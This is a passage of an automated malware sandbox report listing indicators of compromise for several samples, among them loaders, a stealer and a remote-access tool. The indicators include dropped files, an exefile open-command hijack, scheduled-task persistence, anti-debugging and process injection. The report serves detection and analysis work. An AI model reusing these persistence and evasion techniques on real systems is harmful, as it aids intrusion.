description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content AA_v3.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 AA_v3.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 AA_v3.exe File opened for modification C:\Windows\SysWOW64\directx\websetup\dsetup.dll dxwsetup.exe File opened for modification C:\Windows\SysWOW64\directx\websetup\SETD746.tmp dxwsetup.exe File opened for modification C:\Windows\SysWOW64\DirectX\WebSetup dxwsetup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE AA_v3.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache AA_v3.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 AA_v3.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\34B6AF881B9D738561FC099B83DF3A01 AA_v3.exe File created C:\Windows\system32\SubDir\Client.exe plswork.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft AA_v3.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData AA_v3.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\34B6AF881B9D738561FC099B83DF3A01 AA_v3.exe File created C:\Windows\SysWOW64\directx\websetup\SETD736.tmp dxwsetup.exe File created C:\Windows\SysWOW64\directx\websetup\SETD746.tmp dxwsetup.exe File opened for modification C:\Windows\SysWOW64\directx\websetup\dsetup32.dll dxwsetup.exe File opened for modification C:\Windows\SysWOW64\directx\websetup\SETD736.tmp dxwsetup.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies AA_v3.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3908 tasklist.exe 1324 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
pid Process 1264 random.exe 1088 axplong.exe 3832 axplong.exe 3896 axplong.exe 1840 axplong.exe 3484 TROJAN~1.EXE 1368 axplong.exe 4496 axplong.exe 2892 axplong.exe 2124 axplong.exe 788 axplong.exe 2268 axplong.exe 3576 axplong.exe 3360 axplong.exe 4316 axplong.exe 2188 90B1CE~1.EXE -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1792 set thread context of 5036 1792 winn.exe 153 PID 4240 set thread context of 3504 4240 aqbjn3fl.exe 199 PID 4792 set thread context of 3120 4792 winupsecvmgr.exe 317 PID 4792 set thread context of 4036 4792 winupsecvmgr.exe 320 -
resource yara_rule behavioral1/files/0x002900000004519f-4814.dat upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe dxwebsetup.exe File opened for modification C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe svchost.com File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe svchost.com File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe svchost.com File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe svchost.com File opened for modification C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe svchost.com File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\INTERN~1\ExtExport.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe svchost.com File opened for modification C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmlaunch.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\Google\Update\DISABL~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\WINDOW~4\setup_wm.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe svchost.com File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe dxwebsetup.exe File opened for modification C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe dxwebsetup.exe File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmplayer.exe svchost.com File opened for modification C:\PROGRA~2\WI8A19~1\ImagingDevices.exe svchost.com File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\WINDOW~2\wab.exe dxwebsetup.exe File opened for modification C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmprph.exe svchost.com File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~4.EXE dxwebsetup.exe File opened for modification C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpconfig.exe svchost.com File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\WINDOW~4\wmpshare.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe svchost.com File opened for modification C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE dxwebsetup.exe File opened for modification C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE dxwebsetup.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File created C:\Windows\Tasks\Gxtuum.job Gxtuum.exe File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com svchost.com File created C:\Windows\Tasks\Gxtuum.job Gxtuum.exe File opened for modification C:\Windows\directx.sys Client.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File created C:\Windows\Tasks\Gxtuum.job Gxtuum.exe File created C:\Windows\Tasks\Gxtuum.job Gxtuum.exe File opened for modification C:\Windows\svchost.com svchost.com File created C:\Windows\Tasks\Gxtuum.job Gxtuum.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com File created C:\Windows\Tasks\Gxtuum.job Gxtuum.exe File created C:\Windows\Tasks\Gxtuum.job Gxtuum.exe File opened for modification C:\Windows\svchost.com svchost.com File created C:\Windows\Tasks\Gxtuum.job Gxtuum.exe File opened for modification C:\Windows\svchost.com svchost.com File created C:\Windows\Tasks\Gxtuum.job Gxtuum.exe File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\Logs\DirectX.log dxwsetup.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com File created C:\Windows\Tasks\Gxtuum.job Gxtuum.exe File opened for modification C:\Windows\directx.sys svchost.com File created C:\Windows\Tasks\axplong.job axplong.exe File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\svchost.com svchost.com File created C:\Windows\Tasks\axplong.job axplong.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com File opened for modification C:\Windows\directx.sys svchost.com File created C:\Windows\Tasks\Gxtuum.job Gxtuum.exe File opened for modification C:\Windows\directx.sys svchost.com File created C:\Windows\sysnldcvmr.exe m.exe File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com File opened for modification C:\Windows\svchost.com svchost.com File created C:\Windows\Tasks\Gxtuum.job Gxtuum.exe File opened for modification C:\Windows\svchost.com svchost.com -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x00290000000450aa-1368.dat pyinstaller -
Embeds OpenSSL 1 IoCs
Embeds OpenSSL, may be used to circumvent TLS interception.
resource yara_rule behavioral1/files/0x001b000000044b13-3000.dat embeds_openssl -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 4292 3980 WerFault.exe 934 5308 1816 Process not Found 1226 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 322341857.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lummetc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language axplong.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Gxtuum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5008 cmd.exe 5028 PING.EXE -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 STEALC~1.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString STEALC~1.EXE -
Delays execution with timeout.exe 1 IoCs
pid Process 3908 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4228 wmic.exe -
Modifies data under HKEY_USERS 11 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" AA_v3.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" AA_v3.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin AA_v3.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = 4893cd9e8c781441d2a92a7b5f9b3a11bcd37e7e8b8558b059dd60b2da38f1eabdd7394eaa42eb3d1544382cfd1289e9db5f55de50061d9d0541e26e5bf6c9db8fb7162a0fcbb7c53daeac AA_v3.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" AA_v3.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing AA_v3.exe -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings axplong.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings axplong.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings XClient.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings axplong.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings axplong.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" dxwebsetup.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings axplong.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings axplong.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings axplong.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings axplong.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings axplong.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings axplong.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings 4363463463464363463463463.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings 2946613613.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe Key created \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000_Classes\Local Settings Gxtuum.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 2172 reg.exe 2824 reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 5028 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2352 schtasks.exe 4528 schtasks.exe 5308 Process not Found 6036 Process not Found 2052 Process not Found 1856 schtasks.exe 4608 schtasks.exe 2368 schtasks.exe 4420 schtasks.exe 3808 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
